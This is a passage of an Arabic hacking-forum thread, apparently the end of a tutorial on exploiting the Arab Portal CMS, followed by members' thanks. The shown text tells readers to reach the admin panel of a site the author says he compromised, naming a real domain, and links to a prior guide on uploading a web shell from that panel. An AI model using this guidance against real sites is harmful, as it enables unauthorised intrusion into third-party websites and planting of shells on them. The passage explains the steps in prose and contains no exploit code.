    [url=http://up.top4top.net/downloadf-top4top_61afa7320a1-rar.html]ArabPortal | طھط­ظ…ظٹظ„[/url]

    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]
    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/fol3.png[/IMG]

    الان نروح على لوحة التحكم مسارها /admin

    يعني موقعنا اللي ضربناه مثال يصير :-

    [COLOR=Red] [url=http://alzaidichair.com/admin/]لوحة التحكم[/url][/COLOR]

    طبعا اذا فيه لاحقة للموقع مانغيرها كما تعودنا

    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]
    طيب احيان يا بلاك يكون الموقع في بعده portal او sa او ar او اي لاحقة يعني مثلا

    http://****.com/portal

    او

    http://****.com/ar

    وش اسوي انا امسحها ؟

    لا تخليها مثل ماهي وتحط المسار بعدها يعني يصير الرابط


    http://****.com/portal/admin

    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/fol3.png[/IMG]

    اما الان طريقة رفع الشل من اللوحة للي ما شاف شرحنا السابق يشوفه عبر الرابط التالي :-

    [URL]http://www.iq-team.org/vb/t30153.html[/URL]

    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]
    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/fol3.png[/IMG][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]
    [​IMG]

    أتمنى الشرح كان سهل ومفهوم وآسف على الإطالة , والسلام عليكم ورحمة الله وبركاته .

    [​IMG]
     
  2. Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,783
    نقاط الجائزة:
    255
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 7
    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    عاشت الايادي
    بارك الله بيك
     
  3. Black-Heart V • I • P

    الأنتساب:
    ‏24 مارس 2014
    المشاركات:
    102
    الإعجابات المتلقاة:
    1,987
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الإقامة:
    أطهر البقاع
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    PHP
    YouTube:
    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    أشكر لك مرورك العطر :{8!}:
     
  4. Jeo Sawager Developer

    الأنتساب:
    ‏15 أكتوبر 2014
    المشاركات:
    148
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    بآرك آلله بيك
    شرح وآضح وسهل , :{1!}:​
     
  5. Gaza-Dz إدارة الموقع

    الأنتساب:
    ‏26 مايو 2013
    المشاركات:
    1,837
    الإعجابات المتلقاة:
    104
    نقاط الجائزة:
    505
    الجنس:
    ذكر
    الوظيفة:
    DZ
    الإقامة:
    DZ
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    السلام عليكم ورحمة الله
    مشاء الله عليك أخي و الله ابداع × ابداع
    الف شكرا علي السكربت + يوشم بالخمسة نجوم
    تقديرا للمجهوداتك المميزة + يجب أن تضع للبعض سمعات قبل إعطائها إلى Black-Heart مرة أخرى.
    وفقك الله
     
  6. General Rahmane Developer plus DeveloPer Plus

    الأنتساب:
    ‏31 أكتوبر 2014
    المشاركات:
    225
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    رائع جداً

    سلمت يداك يا بطل
     
  7. MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    90
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    C#
    Facebook:
    YouTube:
    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    عاشت ايدك
    {1!$8}[​IMG][​IMG]
     
  8. Dr-Dark Noir <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏17 يوليو 2014
    المشاركات:
    444
    الإعجابات المتلقاة:
    16
    نقاط الجائزة:
    50
    الوظيفة:
    Student
    الإقامة:
    O M A N
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    وعليكم السلام ورحمة الله وبركاتة

    تسلم ايدك حبيبي Black-Heart على شرح رائع و طرح مميز :{2}:

    واصل ولا تحرمنا من جديدك :ُeُe0y:​
     
  9. VB_Dev Developer

    الأنتساب:
    ‏21 أكتوبر 2014
    المشاركات:
    48
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    HTML5
    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    يعطيك آلعآفيه آخيُ ..
     
  10. TeePlow V • I • P

    الأنتساب:
    ‏12 مارس 2014
    المشاركات:
    400
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    السلام عليكم
    شرح رائع بارك الله فيك
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة